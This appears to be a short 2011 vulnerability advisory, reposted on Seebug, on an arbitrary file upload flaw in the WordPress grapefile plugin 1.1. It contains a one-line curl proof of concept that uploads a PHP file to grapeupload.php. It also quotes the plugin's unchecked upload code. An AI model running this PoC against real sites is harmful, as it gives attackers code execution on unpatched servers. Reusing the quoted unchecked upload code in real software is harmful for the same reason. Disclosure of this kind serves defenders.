Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload Date: 30-8-2011 Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ] Version: 1.1 Software link:http://wordpress.org/extend/plugins/grapefile/ PoC: curl -F "userfile=@mycode.php" http://domain.tld/wp-content/plugins/grapefile/grapeupload.php File(s): grapeupload.php grapeupload2.php grapeupload3.php grapeupload4.php Vulnerable code: $uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "success";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论